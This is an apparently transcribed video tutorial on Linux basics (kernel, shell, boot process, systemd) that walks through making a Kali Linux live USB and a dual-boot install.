Then we have security, and this is one of the big things for our community, the cybersecurity and hacking community. The security mechanisms that protect the system from unauthorized access and malicious attacks run through the kernel, including user authentication, access control lists, and network security features. User authentication means the kernel verifies user identities and grants access to resources based on their privileges. When somebody logs in, it first verifies that the login is actually correct, and once you're in, the kernel processes your permissions: "based on what Hank has privileges to, he can access these resources." It won't declare that on screen; it just processes it internally, according to the username, password, and privileges assigned to that user. Then there's access control: the kernel enforces access control mechanisms to protect system files and directories, so if you shouldn't have permission to access a certain file, the kernel is the one that tells you "access denied": you don't have access because of your user's privileges.
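To actually watch system calls happen, there's the strace utility; a hedged sketch (output trimmed, and the exact call names can vary by libc and kernel version):

```bash
# Trace only the file-open, read, and write system calls made by `cat`
strace -e trace=openat,read,write cat /etc/hostname
# openat(AT_FDCWD, "/etc/hostname", O_RDONLY) = 3
# read(3, "myhost\n", 131072)                 = 7
# write(1, "myhost\n", 7)                     = 7
```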
Then there are the network security features, like firewalls and packet filtering, that protect the system from network attacks: detecting that a phishing link was clicked, that you're visiting a malicious website, or that somebody tried to access your system and was denied at the firewall. All of this goes through the kernel; it processes all of those requests, a.k.a. the system calls.

Now the shell. The shell is probably the most basic form of your interaction with the kernel: a text-based command-line interpreter that lets you interact with the computer system. You've probably seen a version of a shell in any movie or show about hacking: that black screen full of white text that looks like gibberish, though hopefully the hacker knows what the hell they're doing. That person interacts with the system through the shell. When we want to make a system call, run a program, access something in the file system, or manage system resources, the shell is our way in. You're not technically interacting with the kernel directly: you input something into the shell, and the kernel takes that input, processes it, calls on system resources and the file system, and does everything you asked. There are lots of ways to communicate with the kernel, your calculator or your text editor for example, but at the most basic level, when you're on a Linux server that only has a command line, the shell is how you issue your commands to the system.

The shell works like this: you provide input by typing a command; the command gets parsed, meaning broken down into its individual pieces, or tokens; and then it gets executed. Say your command has three parts: sudo, then nano, then a file name. sudo says you want root-level privileges, so the shell processes that first: enter your password so it can verify you actually have them, and either you're good or it tells you that you don't have access. Once that's cleared, it executes nano, which is a text editor, and nano opens the file named in the third token. The shell has now executed the full command, the file opens, and you see its contents: that's the output.

Shell scripting is an extension of those shell interactions and commands. It lets you create a document, put a bunch of commands inside it, and then when you run that one shell script, it runs every command inside it without you having to type each one in manually.
This is a very powerful concept in automation. Say you have a repetitive daily task: checking a log file to make sure there's nothing fishy inside it. You write a script that checks that log file every single day for certain strings or pieces of data; if it finds them, it alerts you that there's something to worry about, and if not, it simply reports that everything's fine, system check passed. That's a very simple but powerful use of a shell script, and you can automate a whole pile of repetitive tasks the same way. Shell scripts are, as mentioned, just text files containing a sequence of commands to be executed by the shell.

Why use shell scripts? Think about what automation buys you. First, efficiency: instead of doing a task yourself every single day, you schedule it, using one of the tools we already talked about, and tell the system "run this shell script every day at 9:00 a.m." or "every time this computer starts" (see the cron sketch after this passage). Second, consistency: humans make errors; you mistype a command, or you forget one step in a series of commands. Instead of relying on a human, you write the script once, make sure it's written well with no errors, and then every time that task runs, it's done exactly how it's supposed to be, every single time. Third, flexibility: if you want to do the same task with a variety of different files or different users, you just modify the script and it performs the same series of actions on the next target, and the next. And finally, reusability: you can run the same script over and over and it will never complain, never waver, never water itself down; it runs exactly the same way no matter what version of Linux you're on or how old it is.

Some system administration use cases: backing up system files, monitoring system resources, installing and configuring software, automating user account management, parsing log files and extracting data from them, converting file formats, deploying web applications and running tests against them, compiling and minifying code (which is actually very useful), and general housekeeping like renaming files in bulk, moving and copying files, and scheduling tasks. All of these things can be done through shell scripts.
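A hedged sketch of that "every day at 9:00 a.m." scheduling with cron (the script path is a placeholder):

```bash
# Open your user's crontab for editing
crontab -e

# Add a line like this inside it:
# minute hour day-of-month month day-of-week  command
#   0     9        *         *        *       /home/hank/scripts/check_logs.sh

# List what's currently scheduled
crontab -l
```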
don’t necessarily need to memorize all of this right now because you’re going to run this over and over and over again to practice these things and create them but when you open a shell file when you create a shell file that essentially could be file. sh that would be a shell file you open that the very first line needs to be the shebang line that calls to the path of your your specific shell bash or zsh or whatever it is that would be The Interpreter that you use to write the rest of the code so when you put that at top of the text document the computer then knows okay this is what I’m going to run first this is the very first thing that I’m going to run and this is going to interpret the rest of the commands in this document so then it knows that it’s supposed to run a script and then you can start usually the very next line is a comment so notice how this has a uh hashtag right here but there’s a uh exclamation at the second part of it and then you have the path to the the file The Bash file what this is is very different by having a singular uh hashtag the singular hashtag is just a comment meaning that this is not being processed it’s just something for somebody else who opens this file that wants to see what these individual lines of code represent so you have a #and then you explain what the next block of code does or at the very top of the file you’ll have one hashtag right under your shebang line that will explain okay the purpose of this script is to do X Y and Z and then for each block of code or for even sometimes even each line of code you will have a comment right above it that says this is what this line of code is going to do and then you’ll have the line of code that doesn’t have this so if there’s no comment uh hashtag in front of it that line of code is actually going to be executed which means if you don’t want the script to execute that line of code you put a comment in front of it and then all of a sudden that specific line of code has been neutralized and deactivated and this is actually something you’ll find a lot in configuration files where a lot of the commands that have already been pre-written there’s a comment uh sign in front of them there’s a hashtag in front of them which means that that specific line of code isn’t being run but if you want to configure that software to do that specific activity you just remove that #and now that line of code has been activated and then there are structures for actual flows so there would be the if else commands so if this happens do this otherwise meaning else if this happens do this else do this other thing or don’t do anything for XYZ do ABC uh while this is true then I want you to do this other thing if it’s not true then stop doing it these are types of the control flows and then you have variables so it could be you know name is equal to Hank that would be a variable and then you can use values inside of variables and variables are very very useful but essentially these are kind of like the main points of a script you can create variables within those V or you can uh call on the elements of those variables inside of an IFL statement you can have inside of the IFL statement you can have multiple variables and just recycle all of these things over and over and over again to create complex bits of code but for the most part this is the basic super super basic structure of a shell script and then we have the user space so the user space is the environment where the user level applications actually execute so it’s the 
And then we have the user space. The user space is the environment where user-level applications execute. It's separate from the kernel, obviously, but it's the front-facing environment where the user actually interacts with the system: an isolated environment where applications run without directly touching the hardware. The path goes from the user space to the kernel and then to the hardware, and technically the shell is part of the user space. This separation is crucial for system stability and security: you don't want the average user, who may not know their head from their butt (for lack of a better phrase), interacting with the kernel directly, because they'll mess up the system. So you give them a user space, which has its own layers of software that talk to the kernel, and when something goes wrong, the user space is typically what displays the error message telling the user what they did wrong and what to fix.

Key characteristics of the user space: processes are isolated from each other and from the kernel, preventing one process from affecting another; your video player shouldn't be interacting with your text editor, and neither gets to touch the kernel itself. The user space contains a wide range of applications: text editors, web browsers, games, system utilities. And limited privileges apply, preventing these users and applications from accessing hardware directly or modifying system-level settings. You can't use a basic text editor to modify the kernel; the kernel verifies privileges and effectively says, "you can't modify me, you don't have the privileges." Each user's space gets limited privileges according to whatever the system administrator said they could or could not do.

The user space is separate from the kernel, but they interact constantly: the user space is how the user communicates with the kernel, whether or not they know they're doing it. The kernel provides system calls that allow user-space processes to request services: file system access (reading and writing files), network communication (sending and receiving network packets; it doesn't sound fancy, but every time you load a YouTube video or connect to Gmail, you're requesting packets of data delivered over your network), process management (creating, terminating, and managing processes), and memory allocation (requesting and releasing memory). Through those system calls, user-space processes reach hardware devices and other resources via the kernel, ensuring a secure and controlled environment.
When you think about the kernel, the shell, and the user space together, you can see how they layer on top of each other. The kernel is the bridge that lets the user talk to the hardware, but the user needs some way to talk to the kernel, so they use the tools, software, and resources of the user space; the user space talks to the kernel, and the kernel talks to the hardware. That's basically how you interact with a system in general.

Now we need to know how a computer boots: what is the boot process? There's something called BIOS, and then its updated replacement, UEFI. BIOS, the Basic Input/Output System, is common on older systems. I don't know how old you are, but I remember BIOS on my very first computers: when the machine booted, it would announce that BIOS was initializing. It initializes the hardware (it actually brings up the CPU, the motherboard, and so on) and then passes control to the boot loader, which boots, or loads, the rest of the system. To access the BIOS setup, you typically press a specific key during the boot process, Delete, F2, or Escape depending on the computer: as soon as you power on, you start tapping F2, for example, until the BIOS menu appears. It lets you configure various system settings like the boot order, the clock speed, and hardware settings.

And that looks like this screenshot of the BIOS menu. Most likely you don't recognize it, because this is ancient, but I know we have a few viewers around my age or a little older who definitely will. In the BIOS menu you can set things like hard disk boot priority, quick boot, first/second/third boot device, password checking, et cetera, and you navigate it strictly with the keyboard, no mouse. The essential takeaway: BIOS is on older systems, it's the piece of the boot process that initializes the hardware, and once it's done it passes control of the hardware to the boot loader.

Key functions: the Power-On Self-Test, or POST, conducts a series of tests to check that the hardware is all good, and issues a series of beeps to indicate the outcome. (Very nostalgic for me; I can still recall those beeps every time I turned on my computer, and when there was an issue, the beep pattern was different.) Once POST passes, hardware initialization brings up the essential hardware like the keyboard, the mouse, and the disk drives; then control transfers to the boot loader, which loads the operating system.
So the chain is: BIOS runs POST, initializes devices like the mouse and the drives, hands off to the bootloader to finish the boot process, and the bootloader transfers control of everything to the actual operating system. The "basic input/output" part of the name refers to exactly those services: keyboard and mouse are your basic input, and the display is your basic output.

UEFI, the Unified Extensible Firmware Interface (a mouthful compared to "Basic Input/Output System"), is the modern interface designed to replace BIOS. It offers a more flexible, faster, more secure boot process. Just looking at a UEFI setup screen, it seems more modern, but it does essentially the same things: boot order, passwords, and boot prioritization all still happen in UEFI; it is simply quicker and somewhat more secure. In this particular screenshot there is even an "AI Tweaker" with an overclock tuner, CPU selection options, and so on; understanding all of those settings falls under CompTIA A+ territory, and you really don't need to master them for Linux. What you need to understand is that there was initially BIOS, then UEFI, and the purpose of both is to interact with the hardware, make sure it is initialized, make sure the system checks pass, and then transfer control to the bootloader, which finishes the boot process and ultimately hands control to the operating system itself: Windows, Linux, or macOS. They all follow the same pattern: the firmware brings up the hardware, and once the hardware checks out, control goes to the operating system.

Key advantages of UEFI over BIOS: UEFI can boot systems faster; it has a user-friendly graphical interface (point-and-click instead of keyboard-only navigation); it has enhanced security features like Secure Boot, which helps protect the system from malicious software attacks; it supports larger disk drives than BIOS could; and it supports network boot, letting you boot from a network resource and making it easier to deploy and manage systems remotely, which was not available with BIOS. Otherwise it is very similar to BIOS: it still runs POST, still executes the bootloader, and still boots the operating system. It does literally the same job, just faster, more flexibly, and more securely.
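As a quick aside: on a Linux system that is already running, you can tell which firmware path it booted through, because a UEFI boot exposes itself under /sys. A minimal check:

```bash
# If /sys/firmware/efi exists, the system was booted via UEFI; otherwise legacy BIOS
[ -d /sys/firmware/efi ] && echo "UEFI boot" || echo "Legacy BIOS boot"
```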
Then you have the actual bootloader. The bootloader is the middle ground between BIOS/UEFI and the operating system. Once BIOS or UEFI finishes, GRUB, the GRand Unified Bootloader used by most Linux distributions, takes control of the system and completes the initial boot process. It is the intermediary between the hardware and the operating system: it ensures the correct operating system is loaded and provides a user-friendly way to choose between different boot options. For example, when we go through the installation portion later, you'll see the bootloader on my machine letting us choose between the Kali installation and the Windows installation. BIOS/UEFI makes sure the hardware is good and glitch-free, then the bootloader asks which of the installed operating systems you want to load. That is essentially the whole handoff.

And this is literally what it looks like (just a more modern version than the one on my old computer): a menu with two operating systems, Linux Mint and Ubuntu, plus advanced options for each, and you choose which one to load. GRUB is flexible: it supports multiple operating systems, making it versatile for dual-boot and multi-boot setups; it allows customization of the boot menu, such as timeout settings and the default boot option, through a configuration file (a sketch follows below); it can be configured to provide secure boot options, protecting the system from malicious bootloaders; and it supports advanced features like chain loading, network booting, and kernel parameters, which are beyond the scope of this training. What you need to know: BIOS/UEFI checks the hardware and passes control to the bootloader, which lets you pick the operating system, and from there control goes to that operating system.

So GRUB presents a boot menu; if you dual-boot, you choose whichever OS you want. Once you've selected it, GRUB loads that OS's kernel and initial RAM disk into memory and transfers control to the loaded kernel, which takes over the rest of the boot process. Dual boot is exactly what you just saw broken down: you install an operating system alongside an existing one (Linux Mint could be the primary and Ubuntu the secondary, for example), the installer modifies GRUB's configuration to include the newly installed OS as a boot option, GRUB generates the boot menu, you select the desired operating system from that menu, and the selected OS is loaded and handed control.
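The configuration file mentioned above is distribution-specific, but on many distros the user-editable settings live in /etc/default/grub. A minimal, hedged sketch with illustrative values:

```bash
# /etc/default/grub -- a few common settings (values are illustrative)
GRUB_DEFAULT=0          # which menu entry boots by default (0 = first entry)
GRUB_TIMEOUT=5          # seconds the menu waits before booting the default
GRUB_CMDLINE_LINUX=""   # extra kernel parameters passed at boot

# After editing, regenerate the actual boot menu:
#   sudo update-grub                               # Debian/Ubuntu/Mint
#   sudo grub2-mkconfig -o /boot/grub2/grub.cfg    # Fedora/RHEL-style distros
```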
Once the kernel and the initial RAM disk are in memory, control is transferred to them, they take over from GRUB, the operating system initializes, and you're actually in Linux.

The benefits of dual booting: it is flexible, since you can keep multiple operating systems installed; it allows experimentation, since you can test new operating systems; and it allows task-specific optimization, since you can choose the OS that matches your goal, whether that is gaming, software development, or system administration. It also helps with data stored on partitions formatted with different file systems: if you have data that is only accessible from NTFS (a Windows format), you can boot into Windows, recover that data, and then switch back to Linux. So dual boot lets you deal with different data formats as well as different goals. If you can do it, do it. If you'd rather run Linux from a USB drive as a live boot, and not touch your internal storage or the capacity of your hard disk at all, that is good too. Dual boot means installing Linux to the actual hard drive, so Windows and Linux both live on the physical machine; a live boot runs entirely from the USB stick.

After GRUB, the next stage is the init system. SysVinit is the traditional initialization system used in Linux distros to start system services and processes during boot; SysVinit (or systemd, which we'll talk about next) is the step right after GRUB and the bootloader. It is basically a sequence of scripts that run in a specific order to bring the system up. Under SysVinit, the legacy approach, those scripts live in the /etc/init.d directory and are responsible for starting and stopping system services. It uses run levels: for example, run level 0 is the halt state, run level 1 is single-user mode, and run level 5 is the typical default multi-user mode, chosen based on the configuration. During the boot process the system transitions through run levels, starting from a low level and gradually moving higher, executing the corresponding initialization scripts for each run level along the way.

The limitations: SysVinit is fairly complex to configure and difficult to understand if you don't know scripting syntax, and it can be relatively slow, especially on systems with many services or physical constraints like limited RAM or an old CPU, so booting can be fairly slow.
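Under SysVinit you interact with those scripts directly. A hedged sketch, assuming an ssh init script is installed (script names vary by distro):

```bash
# SysVinit-style service management: call the script in /etc/init.d directly
sudo /etc/init.d/ssh status    # ask the ssh init script for its status
sudo /etc/init.d/ssh restart   # stop the service, then start it again
runlevel                       # print previous and current run level, e.g. "N 5"
```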
SysVinit is also limited on parallelism: it can only start services one after another, sequentially, which is inefficient. You typically want to start everything at the same time; if you have to wait for one service to load before moving to the next, and the next, the boot takes a long time, especially if the hardware is slow and old.

That brings us to systemd, the more current init system. It is sophisticated, and it essentially does what SysVinit did, but better: faster, more flexible, more feature-rich. Where UEFI does the same job BIOS did, systemd does the same job SysVinit did. The way it works: during the boot process, systemd takes control and starts essential services. It manages the life cycle of system services, including starting, stopping, and restarting them; it ensures services are started in the correct order based on their dependencies; and it logs system events and application messages to a central journal, which SysVinit never provided. So it runs through the boot process, starts every service it needs to, makes sure any dependencies those services require are also started, and journals the entire process, so if troubleshooting is ever needed you can backtrack and find out what happened.

It is faster, as we've said, because it starts services in parallel: where SysVinit offers no parallelism, systemd optimizes by starting everything simultaneously, which reduces boot time significantly. If a service requires something else to run, systemd manages those dependencies automatically, so everything loads at the right moment without you, or the average user, having to worry about it. It provides a unified framework for managing system services: starting, stopping, restarting, and enabling or disabling them. It supports socket activation, so services can be activated only when they are actually needed, further improving system performance (sockets are also very useful for networking, but that is beyond our scope here). There is the journaling we already covered, useful after a crash or when analyzing system logs; timers for precise scheduling of tasks; and device management for disks, network interfaces, and USB devices. All of this is handled through systemd, which is, hopefully, what you will actually be dealing with in your responsibilities as a Linux administrator.
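A few hedged examples of poking at those systemd features on a typical modern distro (the unit name is illustrative):

```bash
journalctl -b               # journal entries from the current boot
journalctl -u ssh.service   # journal entries for a single unit
systemd-analyze blame       # per-unit startup times, a side effect of parallel boot
```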
You most likely won't have to deal with SysVinit in the real world at all, unless you're maintaining a genuinely old-school system. If you do, just remember: everything runs based on run levels, each associated with scripts inside the /etc/init.d folder; services start one after another rather than in parallel; it doesn't handle dependencies very well; and it is fairly slow. Those are the key features to keep in mind about SysVinit, and everywhere SysVinit falls short, systemd fills the gap and then some, as you just saw.

Now we get to look at run levels and boot targets. Run levels are a SysVinit concept: each run level represents a specific state of the system, and the system transitions through them during the boot process via those scripts. The standard run levels are:

- 0: halt (stop) the system
- 1: single-user mode
- 2: multi-user mode without NFS (the network file system)
- 3: multi-user mode without the graphical user interface
- 4: not used
- 5: full multi-user mode with the graphical user interface (typically the default)
- 6: reboot the system

These run levels are tied to the scripts inside the /etc/init.d directory that we talked about. When a system boots, it starts in a low run level and works its way up as it initializes, moving to higher run levels and starting whatever services are associated with each one. The scripts define the actions to take when entering or exiting a particular run level, and the init process, which manages run levels, can be instructed to switch to a different one using the `telinit` command or by issuing a specific signal. For example, `telinit 1` asks the system to go to run level 1, single-user mode, causing it to stop most services and drop into that minimal environment, while `telinit 5` would ask for run level 5.
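A hedged sketch of switching run levels on a SysVinit system:

```bash
sudo telinit 1   # drop to single-user (maintenance) mode, run level 1
sudo telinit 5   # go to full multi-user mode with a GUI, run level 5
```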
Then you have boot targets in systemd, which replace run levels: SysVinit had run levels, systemd has boot targets, a powerful mechanism for managing system state. Targets represent groups of services that should be started or stopped together, and by defining and controlling targets you can efficiently manage the system's behavior under different circumstances. A target works through dependency management, activation, and deactivation: systemd automatically determines the dependencies between the services a target needs and starts them in the correct order; when a target is activated, systemd starts all the services associated with it, including their dependencies; and when a target is deactivated, it stops all the services associated with it. Fairly simple.

The common targets:

- multi-user.target: the default target; it starts the services required for a multi-user environment, including networking, file systems, and basic system services.
- graphical.target: starts graphical services like the display manager and desktop environment, on top of what multi-user.target provides. If your version of Linux supports a GUI, this is the target the boot lands on.
- rescue.target: starts only the services necessary for system recovery, such as a minimal shell; you normally only land here while troubleshooting.
- emergency.target: the minimal target, starting only the most critical services required for system maintenance, generally without network access. It is the lowest level, for when you are working on one specific system and trying to figure out exactly what is wrong.

If you want to manage the SysVinit scripts, you have to know where they live: /etc/init.d. They are typically named after whatever service they run (apache2 if you're running Apache 2, mysql, ssh, and so on), and each script contains instructions for starting, stopping, and restarting the corresponding service. SysVinit executes them in a specific order, ensuring services start in the correct sequence with their dependencies met. For example, if you're running an Apache 2 server, Apache needs to be loaded before any other software or service that requires it; try to load that dependent service without Apache running and it simply doesn't work, so things have to run in order.

systemd covers the same ground differently. Instead of scripts running sequentially, you manage services explicitly through enabling, disabling, starting, stopping, checking, restarting, and reloading, and the pattern is very simple and intuitive: `sudo systemctl enable <service>`, `disable <service>`, `start <service>`, `stop <service>`, and so on (systemctl is short for "system control"). Enabling marks a service to start automatically at boot, while starting runs it immediately; in practice you typically enable and then start a new service, check its status to confirm it is active, and stop it before disabling it when you retire it.
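A hedged sketch of that whole lifecycle, using ssh as a stand-in service name, along with the target commands from above:

```bash
systemctl get-default                      # which target the system boots into
sudo systemctl isolate multi-user.target   # switch targets right now

sudo systemctl enable ssh    # start automatically at boot
sudo systemctl start ssh     # start right now
systemctl status ssh         # confirm it is enabled and active
sudo systemctl restart ssh   # stop, then start again
sudo systemctl reload ssh    # re-read config without a full restart
sudo systemctl stop ssh      # stop right now
sudo systemctl disable ssh   # stop starting at boot
```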
Once a service is enabled and started, checking its status shows it as active and currently running. If you need to restart it, just restart it (restarting something that was never started doesn't make much sense). And if you've modified a service's configuration file and want the changes applied, reload it: if the service is already running, a reload re-reads the configuration without requiring a full restart.

Okay, let's talk about installation and package management, specifically preparing for and installing distributions. Selecting a Linux distribution really comes down to what you are trying to accomplish, because there are a variety of different distros: desktop-oriented ones like Ubuntu, Fedora, and Mint; server-oriented ones like CentOS, Ubuntu Server, and Debian (plus Red Hat Enterprise Linux, which I forgot to include in the title here); and security and pen-testing distros like Kali Linux. Depending on what you want to do, each project's official website is where you download its ISO image, and that is important to consider.

If I go to the Kali website, for example, this is what it looks like: installer images, virtual machines, cloud, mobile/ARM devices, containers, live boot, and so on. For the purposes of this portion of the tutorial I'll be using a live boot ISO image, meaning we want something we can load from a USB drive. You can use one of those mini thumb-sized USB drives, or an external drive attached by cable, which is what I'll be using, mostly because I'm also going to use it as a storage container. A typical small USB thumb drive doesn't have that much capacity; it generally won't go into the terabytes (at least not the ones I've looked at recently), and I need a significant amount of storage because for the rest of these tutorial recordings I have to store video files on that same drive. But essentially this can be installed on any kind of USB drive, which is what's called a live boot or live installation. You can choose whatever image fits your purpose from the distro's website, and the same thing applies to all the other distributions: you want an ISO image of the distro you've chosen, whether you'll install it directly on your computer, run it under a hypervisor as a virtual machine, or write it as a live image to boot from a USB drive. In any of those cases, you get your ISO images from these official links.
I'm going to put these links in the description below so you can access them directly, and I highly recommend you don't get ISOs from any kind of torrent website. Get them straight from the official website for each distribution, so you can be sure the ISO hasn't been manipulated and you're not downloading anything that has been tampered with. This is a really important point: don't download a pre-modified image, even if the developer claims the modifications are really helpful; learn how to make those modifications yourself. With a torrent download you never know what you're getting, and if there is malware, ransomware, a Trojan, a worm, whatever baked into it, you do not want to deal with that. So, one last notice: download directly from the official websites so you get the verified ISO images and know they're good to go.

As for the installation process itself, I'll give you a step-by-step overview and then demonstrate a live installation of Kali Linux (because I love Kali Linux) onto an external USB drive, so you can see what the entire process looks like.

First and foremost, prepare your external drive. I always format it, especially a fresh drive, and you want to make sure it runs on all the major operating systems: Windows, macOS, and Linux. If it is formatted for only one OS and won't mount on macOS or Linux, you'll be hindered and limited. Even on a brand-new drive, you can use something like macOS Disk Utility (or the equivalent on Windows) to format it so it works across all of them; I'll show you what that looks like in a bit. Also make sure it has enough storage space for Kali Linux: the ISO image isn't large, but the recommendation is at least 4 GB on the drive to be safe.

Then download the ISO from one of the official links I gave you, choosing the image of the distro that matches your system architecture and your needs.

Next comes creating the bootable media. This is where Etcher comes in (a free tool, which I'll be using on macOS), or Rufus (also free, a Windows tool). These tools take the ISO image and write it to the USB drive as a live image, so the USB becomes a bootable device: connect it to a machine that allows booting from USB and you can load the Kali Linux image straight from the device.
Technically you'll be walking around with, essentially, a computer on a USB drive; that's what it feels like. So: turn the USB drive into bootable media (we'll do that live as well), then boot from the USB drive. That part is fairly simple and straightforward; you just work through the wizard. There are a few options you need to choose once I boot from the USB drive, and I'll record those so you can see them. In every case I've gone through, you need to get into the BIOS or UEFI settings, the very base settings of the computer, so that it lets you boot from an external device instead of internal storage; that is what we'll be doing.

Then there is the Linux installation itself. Typically the bootable media is made with Rufus or Etcher, and sometimes the rest happens on your computer as you go through the boot process, where you do your Linux installation. If you're just running from a USB drive, there is no real installation; it simply loads from the USB, so that step is optional. The same goes for choosing your language, location, and keyboard layout, which can come up while booting the installer. The installation-target step is done in Etcher or Rufus: you choose the external SSD (that is, the USB drive) as the target, and it writes the live version of Linux onto that external drive. Then you go through the motions; you may be prompted to set up a username and password, and if you aren't, the default username and password are kali/kali, which you can change once you're logged in. Finally you restart the computer, boot into Linux from the external SSD, your operating system loads, and you're inside Kali Linux. That's the step-by-step; now I'm going to actually go through those steps and show you what they look like.

Okay, this is Disk Utility on my Mac. What we can see here is my primary 2 TB drive, the Linux drive, and a balenaEtcher disk image that is mounted because that is what we'll use to write the Kali Linux ISO. I've already formatted this drive, but I want to show you the process of making it usable by all operating systems. I click on the drive itself, go to Erase, keep the name (Linux), and then the format is the big piece: MS-DOS (FAT), as you can imagine, is the Microsoft option, and Mac OS Extended (Journaled) is macOS-specific. What we want is exFAT, the multi-OS format, which ensures the drive will run on essentially any operating system.
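For reference, the same erase can be done from the macOS terminal; a hedged sketch, where the disk identifier and volume name are illustrative (confirm yours with `diskutil list` first, because this wipes the whole drive):

```bash
# Erase /dev/disk5 entirely and reformat it as exFAT with the volume name "Linux"
diskutil eraseDisk ExFAT Linux /dev/disk5
```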
If the formatting options you see aren't exactly the ones shown here, a simple Google search or a conversation with Gemini or GPT will turn up the specific format that lets the drive boot from any kind of machine, macOS, Windows, and so on. As for the Security Options: this drive previously held data, and I left the slider at "Fastest", which means the erase isn't secure and the old data would still be recoverable. Slide it all the way to the other end and the erase becomes absolutely unrecoverable: the drive is overwritten with multiple passes of zeros and ones, and you won't be able to pull any data off it. That choice is up to you; for a brand-new drive it doesn't really matter, but if you're wiping something you previously used, you might want the fast option so the data is potentially recoverable at some point. Once you've selected your options, click Erase, and it wipes the whole thing and gives you effectively a brand-new drive ready for the installation process. Afterward it shows about 1 TB free, with roughly 12 MB still used, which I presume is leftover bookkeeping from all the data I erased. That's pretty much it: the USB drive is now ready for installation using either Rufus or Etcher.

Now that my drive is ready, I'll choose the version of the ISO that is most applicable to me, which in this case is the live boot available here. "Live boot" means an unaltered host system: your main computer won't be changed in any way, and the live system gets access to the host's hardware, so if you have 16 GB of RAM, the live boot uses that 16 GB, along with the customized Kali kernel. (Of course, performance can decrease under heavy I/O, input/output, since everything runs from the USB.) It is very quick and easy, you get a full Kali installation, and you can do the same with all the other versions of Linux as well; this isn't limited to Kali. So I click Live Boot, then pick 64-bit, because my machine can handle 64-bit, and from here on out I'll be using a Windows machine, where I've verified everything is good as well.

One more thing on this download page: next to the torrent link you see a "sum" value. That is the SHA-256 hash of this particular ISO image. For security purposes, especially if you don't get your ISO directly from the Kali website but from some torrent site, you need to compute the SHA-256 sum of the file you downloaded and check whether it exactly matches this value. If the value has been altered by even one character, don't use it: the officially published SHA-256 hash is the one Kali has confirmed, and a match is what makes the image something you can trust.
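A hedged sketch of that check (the filename is illustrative; use whatever ISO you actually downloaded):

```bash
shasum -a 256 kali-linux-live-amd64.iso   # macOS
sha256sum kali-linux-live-amd64.iso       # Linux
# Compare the printed hash to the SHA256 sum on the official download page;
# any difference means the image was corrupted or tampered with. Don't boot it.
```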
The installer image itself is 4.3 GB, so I click Download and it starts downloading; once it's done, we'll go through Etcher and write it to our USB drive.

Okay, our ISO has officially downloaded and I have Etcher open. As you can see, it is a very simple, uncomplicated interface. We're going to flash from the file we downloaded, the ISO image (you can also flash from a URL, or clone a specific drive you have). I click Flash from file, choose the ISO image, which is sitting right in my Downloads folder with the .iso extension, click Open, and then select the target we want to write to. In my case I see my Seagate Backup Slim, the 1 TB drive; that is the one I know I want. There's also the Apple SSD and various other entries I don't want to touch in any way, including the Seagate 2 TB portable media drive. Now, since I've renamed these drives and Etcher isn't showing the renamed labels, there is a way to find out which physical drive has been assigned to disk4, disk5, and so on, and we're going to do that inside the terminal.

I have my terminal loaded, and the command is very simple: `diskutil list`. Press Enter and it brings up a bunch of data, including all the partitioned drives, and those partitions carry the names we've assigned to them. In my case, Etcher showed /dev/disk4 and /dev/disk5 as the two external candidates, along with their size and storage data. The 2 TB one is the drive I named "primary 2TB" (the actual name I gave it, not the name it came pre-installed with when I bought the Seagate drive). The next one is the one I named Linux, the drive I'm most interested in, and I can see it has the 1 TB size; the 2 TB one, by contrast, has very little availability left because I've stored so much data on it. The Linux drive sits under /dev/disk5, which is what is most useful to me. Having confirmed that information, I know I want the drive on /dev/disk5, so I can continue my installation in Etcher.
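For clarity, that identification step in the terminal boils down to two real diskutil commands (the device number will differ on your machine):

```bash
diskutil list          # list every disk and partition, with the volume names you assigned
diskutil info disk5    # detail for one device; confirm its size and name before flashing
```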
And here it is, pretty much what I figured, since I knew it was the 1 TB drive: the Seagate Backup Slim media device. I select it as my target drive, and that's it; click Flash. Etcher warns: "you're about to erase an unusually large drive; are you sure the selected drive is not a storage drive?" I'm sure, because I know I can still use it as a storage drive once I launch Kali Linux from my other computer. You'll also be notified to enter your password, because flashing requires privileged access. (I hadn't pressed Enter, so it actually stopped; we'll retry one more time and I'll enter my password at the end to give it the permission it needs.) Okay, there you go: the password went through, I granted Etcher access to this particular drive, and you can see it working. It goes very quickly, since it isn't a massive ISO image; maybe another 30 seconds or so, and then Kali Linux will be on this external USB drive and we can boot it and talk about partitions, package managers, and so on.

All right: I reboot my computer and keep pressing F12 (this is on a Windows machine), which takes me to the boot menu. From there, the option I want is the boot-from-file screen, which is F9 for me. I choose a live boot from a file, pick the Kali image I made, navigate to EFI, then to boot, then choose the 64-bit version, and this is what we land on: the actual Kali boot menu, the same one you'd see from any USB drive or even a CD-ROM, if you still have one. It offers options to boot live from the USB itself, plus the installation options. For this section I'm going to boot the live USB image with USB persistence. As soon as you pick that option it brings you to the loading screen; it usually takes maybe 20 to 30 seconds to load, and then the operating system is running, ready to go, with all the utilities installed. That's it; it really is that quick to boot from a USB drive without going through the full installation process.

(I have to record this part of the screen with my cell phone, which is why the image quality looks like this; once we're doing proper screen capture inside the Kali Linux machine it will be much clearer and you'll be able to see everything as I click around.) And here we have it: the operating system loaded and ready to go. We have the file system with all the system binaries and everything like that, you can open a terminal and have it run quickly and smoothly, and the vast majority of the utilities come pre-installed.
If you want to get to your home directory as the user, you access it through the file system, and through the menu you get access to all the available utilities and shortcuts. It's a fully functional operating system.

What I'm going to do now is restart it, which takes us back to the very beginning of the computer's boot process, and press F12 again to get to the boot menu. Once we're inside the boot menu, we repeat the same process as before: F9 for the boot-from-file screen, choose our Kali live image, go to the EFI option, then to boot, then choose the 64-bit version again. But this time, when we get to the Kali menu, I'm going to click the install option, so we go through a full install and you can see what it's like to work through the installation process with the Kali Linux wizard, how to select your partitions, and so on.

Pretty much like every other operating system booting for the first time, it asks for your preferences: your language, your country, the variant of English in my case, and I just keep pressing Next until it gets to the point where I have to choose my partitions. Essentially it is going to ask how I want to split the storage of the computer I'm on. I initially described this as a type 2 hypervisor setup, then as a type 1, but I stand corrected: strictly speaking there is no hypervisor involved at all. We are not logging into the Windows OS and using virtualization software to launch Kali on top of it; we are booting Kali directly on the computer's hardware, alongside Windows, as a dual-boot option. Once this installation finishes, whenever we restart and reach the boot menu, we can choose to boot Kali Linux instead of booting into Windows; Kali runs on top of my computer's hardware rather than on top of the Windows OS. Meanwhile, you can see I'm setting up my username and a password for my installation; all of this is very intuitive and the instructions are easy to follow.

Then we get to the portion where we make the selection for how we want to create our partitions. The installer gives a recommended, guided option; if you don't know what you're doing, just follow along with the options it gives you, and it creates the most basic partition split for your root directory, your users' home directories, and all the other primary and extended partitions necessary to boot Kali Linux. I'm using the external drive you can see right here, which has about a terabyte of storage for my partitioning and file system.
